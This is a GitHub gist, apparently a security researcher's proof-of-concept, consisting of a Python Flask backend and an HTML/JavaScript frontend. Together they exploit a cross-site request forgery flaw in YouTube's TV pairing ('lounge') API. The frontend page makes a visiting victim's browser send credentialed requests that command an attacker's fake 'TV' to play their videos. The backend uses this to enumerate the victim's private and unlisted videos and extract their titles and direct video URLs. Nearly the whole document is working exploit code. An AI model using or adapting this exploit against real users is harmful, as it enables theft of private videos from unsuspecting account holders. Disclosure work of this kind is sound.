Last active
June 5, 2024 06:38
-
-
Save xdavidhu/b264ee21d8586e580adc7f821ddfbfc9 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# POC Flow: | |
# 1. Request the victim/frontend to play all of his/her videos | |
# on the malicious "TV", and find out what videos are private. | |
# | |
# 2. Iterate over all of the victim's private videos, | |
# and request the victim/frontend to play all of | |
# them one by one. When the victim plays one, the | |
# malicious "TV" get's a credential for it. | |
import requests | |
import re | |
from flask import Flask, request, abort | |
import json | |
import threading | |
import logging | |
import time | |
from urllib.parse import unquote | |
import os | |
# Enter an API key with YouTube Data API enabled | |
YT_DATA_API_KEY = "" | |
# The host to bind the POC webserver to | |
host_to_bind_to = "127.0.0.1" | |
# List of endpoints used by the script later. | |
# Extracted from rquests made by the YouTube/YT TV JS, | |
# so some parameters have some seemingly "random" values. | |
API_VIDEOS = "https://www.googleapis.com/youtube/v3/videos?part=snippet%2C%20status&id=[video_ids]&key=[api_key]" | |
YT_SCREEN_ID = "https://www.youtube.com/api/lounge/pairing/generate_screen_id" | |
YT_TOKEN = "https://www.youtube.com/api/lounge/pairing/get_lounge_token_batch" | |
YT_BIND_INIT = "https://www.youtube.com/api/lounge/bc/bind?device=LOUNGE_SCREEN&id=8700c39e-eec8-4923-8d84-41dcd5d0435f&name=YouTube%20on%20TV&app=lb-v4&theme=cl&capabilities=dsp&mdxVersion=2&loungeIdToken=[token]&VER=8&v=2&RID=580&CVER=1&zx=lmxe5k2biyyg&t=1" | |
YT_BIND = "https://www.youtube.com/api/lounge/bc/bind?device=LOUNGE_SCREEN&id=8700c39e-eec8-4923-8d84-41dcd5d0435f&name=YouTube%20on%20TV&app=lb-v4&theme=cl&capabilities=dsp&mdxVersion=2&loungeIdToken=[token]&VER=8&v=2&RID=rpc&SID=[sid]&CI=1&AID=3&gsessionid=[gsid]&TYPE=xmlhttp&zx=2icgcq6qwpat&t=1" | |
YT_GET_VIDEO_INFO = "https://www.youtube.com/get_video_info?html5=1&video_id=[video_id]&c=TVHTML5&vvt=[ctt]" | |
# Regexes used to grep for specific strings in the responses | |
INIT_SID_REGEX = r"(?<=\[\"c\",\").+?(?=\")" | |
INIT_GSID_REGEX = r"(?<=\[\"S\",\").+?(?=\")" | |
VIDEOIDS_REGEX = r"(?<=\"videoIds\":\").+?(?=\")" | |
CTT_REGEX = r"(?<=\"ctt\":\").+?(?=\")" | |
VIDEOID_REGEX = r"(?<=\\\"videoId\\\":\\\").+?(?=\\\")" | |
PRIVATE_URL_REGEX = r"(?<=\"url\":\").+?(?=\")" | |
PRIVATE_TITLE_REGEX = r"(?<=\"title\":\").+?(?=\")" | |
# Global variables used by the Flask server | |
global lounge_token | |
global lounge_token_ready | |
lounge_token_ready = False | |
global current_private_video_request_id | |
current_private_video_request_id = 0 | |
global current_private_video_request_video_id | |
global private_video_request_ready | |
private_video_request_ready = False | |
global private_video_request_done | |
private_video_request_done = False | |
global victim_uploads_pl | |
# Flask server / endpoints | |
app = Flask(__name__) | |
log = logging.getLogger('werkzeug') | |
log.disabled = True | |
# Check the 'Host' header to protect against | |
# DNS rebinding attacks | |
@app.before_request | |
def before_request_callback(): | |
if request.headers.get("host") != host_to_bind_to + ":8090": | |
abort(403) | |
# Serves the 'frontend.html' to the victim | |
@app.route("/") | |
def get_frontend(): | |
with open("frontend.html", "r") as file: | |
return file.read() | |
# Returns the initial configuration for the victim, | |
# which consists of the 'lounge_token' and the | |
# victim's 'uploads' playlist ID | |
@app.route('/get_lounge_token') | |
def get_lounge_token(): | |
if lounge_token_ready == False: | |
return 'not-ready' | |
else: | |
return json.dumps([lounge_token, victim_uploads_pl]) | |
# Returns the current 'private video request' to the frontend. | |
# The frontend is polling this endpoint, and when one | |
# private video is process, the backend updates the | |
# content to point to the next private video. | |
@app.route('/get_current_private_video') | |
def get_current_private_video(): | |
if private_video_request_ready == False: | |
return 'not-ready' | |
elif private_video_request_done: | |
return 'done' | |
else: | |
return json.dumps({ | |
"id": current_private_video_request_id, | |
"lounge_token": lounge_token, | |
"video_id": current_private_video_request_video_id | |
}) | |
# end_flask | |
# Generates a 'screen_id' | |
def get_screen_id(): | |
print("[+] Getting screen_id...") | |
r = requests.get(YT_SCREEN_ID) | |
return r.text | |
# Requests a 'loungeToken' with a 'screen_id' | |
def get_token(screen_id): | |
print("[+] Getting token for screen_id...") | |
r = requests.post(YT_TOKEN, data={"screen_ids": screen_id}) | |
return r.json()["screens"][0]["loungeToken"] | |
# Get's the credentials required for the 'bind' endpoint | |
def init_bind(lounge_token): | |
print("[+] Getting the credentials for polling...") | |
r = requests.post(YT_BIND_INIT.replace("[token]", lounge_token)) | |
sid = re.findall(INIT_SID_REGEX, r.text)[0] | |
gsid = re.findall(INIT_GSID_REGEX, r.text)[0] | |
return sid, gsid | |
# Starts polling the 'bind' endpoint. | |
# Waits for the frontend to "play" the victim's | |
# 'uploads' playlist. | |
def bind(lounge_token, sid, gsid): | |
print("[+] Starting to poll leanback bind endpoint...") | |
while True: | |
bind_url = YT_BIND.replace("[token]", lounge_token) | |
bind_url = bind_url.replace("[sid]", sid) | |
bind_url = bind_url.replace("[gsid]", gsid) | |
r = requests.get(bind_url) | |
if "\\\"videoIds\\\":[]" in r.text: | |
print("[!] Victim has no videos!") | |
return [] | |
video_ids = re.findall(VIDEOIDS_REGEX, r.text) | |
if len(video_ids) > 0: | |
video_ids = video_ids[0].split(",") | |
print("[+] Victim connected! Videos: " + str(len(video_ids))) | |
return video_ids | |
# Queries the YouTube Data API to find out the | |
# privacy status of the provided list of videos. | |
def process_videos(video_ids): | |
unlisted_videos = [] | |
unlisted_video_ids = [] | |
private_video_ids = [] | |
public_video_ids = [] | |
print("[+] Querying YouTube Data API to find which videos are private/unlisted...") | |
api_url = API_VIDEOS.replace("[api_key]", YT_DATA_API_KEY) | |
api_url = api_url.replace("[video_ids]", ",".join(video_ids)) | |
r = requests.get(api_url) | |
api_response = r.json() | |
for item in api_response["items"]: | |
if item["status"]["privacyStatus"] == "unlisted": | |
unlisted_video_ids.append(item["id"]) | |
unlisted_videos.append([item["id"], item["snippet"]["title"]]) | |
else: | |
public_video_ids.append(item["id"]) | |
for video_id in video_ids: | |
if not video_id in public_video_ids: | |
if not video_id in unlisted_video_ids: | |
private_video_ids.append(video_id) | |
print("\n[+] Victim has:") | |
print(" " + str(len(public_video_ids)) + " public videos") | |
print(" " + str(len(unlisted_video_ids)) + " unlisted videos") | |
print(" " + str(len(private_video_ids)) + " private videos") | |
return unlisted_videos, private_video_ids | |
# Starts polling the 'bind' endpoint. | |
# Waits for the frontend to "play" one of the | |
# victim's private videos. | |
def bind_private(lounge_token, sid, gsid, video_id): | |
print("[+] Starting to poll leanback bind endpoint for private video '" + video_id + "'...") | |
while True: | |
bind_url = YT_BIND.replace("[token]", lounge_token) | |
bind_url = bind_url.replace("[sid]", sid) | |
bind_url = bind_url.replace("[gsid]", gsid) | |
r = requests.get(bind_url) | |
ctt_find = re.findall(CTT_REGEX, r.text) | |
video_id_find = re.findall(VIDEOID_REGEX, r.text) | |
if len(ctt_find) > 0: | |
if len(video_id_find) > 0: | |
if video_id_find[0] == video_id: | |
return ctt_find[0] | |
# Queries the 'get_video_info' endpoint with the | |
# credentials from the victim to get one private video's | |
# raw video url and title. | |
def get_private_video_info(video_id, ctt): | |
print("[+] Requesting 'get_video_info' with ctt for '" + video_id + "'...") | |
video_url = YT_GET_VIDEO_INFO.replace("[video_id]", video_id) | |
video_url = video_url.replace("[ctt]", ctt) | |
r = requests.get(video_url, headers={"X-YouTube-Client-Name": "TVHTML5", "X-YouTube-Client-Version": "6.20180913"}) | |
response = unquote(r.text).replace("\\u0026", "&") | |
url = re.findall(PRIVATE_URL_REGEX, response)[0] | |
title = re.findall(PRIVATE_TITLE_REGEX, response)[0] | |
return url, title | |
# Start of the main POC flow | |
# Start the flask server. | |
print("[+] Starting Flask in a background thread...") | |
flask_thread = threading.Thread(target=app.run, kwargs={"host": host_to_bind_to,"port": 8090,"use_reloader": False}) | |
flask_thread.start() | |
time.sleep(1) | |
print("\n[+] Server is running. Send 'http://" + host_to_bind_to + ":8090' to vitim.\n") | |
# Request the victim's channel ID from the user | |
channel_id = input("[?] Enter the victim's channel ID: ") | |
# Convert the channel ID to the victim's 'uploads' playlist ID. | |
l = list(channel_id) | |
l[1] = "U" | |
victim_uploads_pl = "".join(l) | |
print("[+] Victim's 'uploads' playlist ID: " + victim_uploads_pl) | |
print("[*] 'uploads' playlist's ID is just the channel id, but the second char 'C' -> 'U'") | |
print("[*] '" + channel_id + "' -> '" + victim_uploads_pl + "'\n") | |
# Step 1 - Requesting the victim to "play" his/her | |
# 'uploads' playlist. | |
screen_id = get_screen_id() | |
lounge_token = get_token(screen_id) | |
sid, gsid = init_bind(lounge_token) | |
lounge_token_ready = True | |
video_ids = bind(lounge_token, sid, gsid) | |
# Process these videos and find out which one is private/unlisted. | |
unlisted_videos, private_video_ids = process_videos(video_ids) | |
# Print the victim's unlisted videos. | |
print("\n[+] Victim's unlisted videos:") | |
for video in unlisted_videos: | |
print("\n ID: " + video[0]) | |
print(" Title: " + video[1]) | |
print(" YouTube URL: https://youtu.be/" + video[0]) | |
print("") | |
# Step 2 - Iterate over all private videos of the victim, | |
# and request the frontend to "play" all of them one by one. | |
print("[+] Getting the vitim's private videos...") | |
private_videos = [] | |
for video_id in private_video_ids: | |
current_private_video_request_video_id = video_id | |
# Create fresh credentials for each video. | |
# This could be done better, but getting the | |
# bind endpoint to work with only one request was | |
# quite complex already. | |
screen_id = get_screen_id() | |
lounge_token = get_token(screen_id) | |
sid, gsid = init_bind(lounge_token) | |
if not private_video_request_ready: | |
private_video_request_ready = True | |
# Increment the 'request ID' by one to keep the | |
# frontend & backend in sync. | |
current_private_video_request_id += 1 | |
print("["+str(current_private_video_request_id)+"/"+str(len(private_video_ids))+"] Requesting frontend to play '" + video_id + "'...") | |
ctt = bind_private(lounge_token, sid, gsid, video_id) | |
print("[+] Got CTT '" + ctt + "' for video '" + video_id + "'!") | |
url, title = get_private_video_info(video_id, ctt) | |
private_videos.append([video_id, ctt, title, url]) | |
# If the victim has no private videos, | |
# tell this to the frontend to make it | |
# stop polling. | |
if not private_video_request_ready: | |
private_video_request_ready = True | |
private_video_request_done = True | |
# Print the victim's private videos. | |
print("\n[+] Victim's private videos:") | |
for video in private_videos: | |
print("\n ID: " + video[0]) | |
print(" Title: " + video[2].replace("+", " ")) | |
print(" YouTube URL: https://youtu.be/" + video[0]) | |
print(" Direct video URL: " + video[3]) | |
print("") | |
print("[+] Done") | |
# Wait for frontend to recieve the 'done' command from | |
# the poll endpoint. | |
time.sleep(2) | |
# Exit ugly, because I counldn't figure out how to | |
# stop Flask in the other thread... | |
os._exit(0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<h4 id="log"></h4> | |
<script> | |
// Write a log entry to the page. | |
function log(message) { | |
document.getElementById("log").innerHTML += "\n " + message + "<br>" | |
} | |
// Sleep. | |
function sleep(ms) { | |
return new Promise(resolve => setTimeout(resolve, ms)); | |
} | |
// Send the CSRF request to play a new video/playlist on the malicious "TV". | |
function send_command(loungeToken, id, idType) { | |
return new Promise(function (resolve, reject) { | |
var xhr = new XMLHttpRequest() | |
xhr.open("post", "https://www.youtube.com/api/lounge/bc/bind?device=REMOTE_CONTROL&id=&name=Desktop&app=youtube-desktop&mdxVersion=3&VER=8&v=2&ui=1&method=setPlaylist¶ms={\"" + idType + "\":\"" + id + "\",\"currentIndex\":0}&loungeIdToken=" + loungeToken, true) | |
xhr.onload = function () { | |
resolve(xhr.response) | |
}; | |
xhr.onerror = function () { | |
resolve() | |
} | |
xhr.withCredentials = true; | |
xhr.send("count=0") | |
}); | |
} | |
// Send a get request. | |
// Used to query the backend. | |
function get(url) { | |
return new Promise(function (resolve, reject) { | |
var xhr = new XMLHttpRequest() | |
xhr.open("get", url, true) | |
xhr.onload = function () { | |
resolve(xhr.response) | |
}; | |
xhr.send() | |
}); | |
} | |
async function main() { | |
log("[+] Page loaded") | |
// Start of "Step 1" | |
// Poll the victim for the 'loungeToken' and for which playlist to play. | |
log("[+] Polling backend for loungeTokenResponse...") | |
var loungeTokenResponse = "not-ready" | |
while (loungeTokenResponse == "not-ready") { | |
loungeTokenResponse = await get(window.location.href + "get_lounge_token") | |
await sleep(200) | |
} | |
log("[+] Got loungeTokenResponse: " + loungeTokenResponse) | |
loungeTokenResponse = JSON.parse(loungeTokenResponse) | |
// Play the playlist requested by the backend. | |
log("[+] Triggering malicious \"TV\" to play all uploads of victim...") | |
await send_command(loungeTokenResponse[0], loungeTokenResponse[1], "listId") | |
// Start of "Step 2" | |
// Poll the backend to find out which private video to play. | |
log("[+] Polling backend for private video requests...") | |
var previous_id = 0 | |
while (true) { | |
private_video_request = await get(window.location.href + "get_current_private_video") | |
if (private_video_request == "not-ready") { | |
continue | |
} | |
else if (private_video_request == "done") { | |
break | |
} | |
else { | |
private_video_request = JSON.parse(private_video_request) | |
// The ID has to be bigger then the last request. | |
// This way the backend & frontend can stay in sync | |
// to not play the same video multiple times. | |
if (private_video_request["id"] > previous_id) { | |
log("[+] Backend requested to play the private video: " + private_video_request["video_id"]) | |
// Play the current private video on the malicious "TV". | |
log("[+] Playling private video '" + private_video_request["video_id"] + "' on malicious \"TV\"...") | |
await send_command(private_video_request["lounge_token"], private_video_request["video_id"], "videoId") | |
previous_id += 1; | |
} | |
} | |
await sleep(200) | |
} | |
log("[+] Done") | |
} | |
main() | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment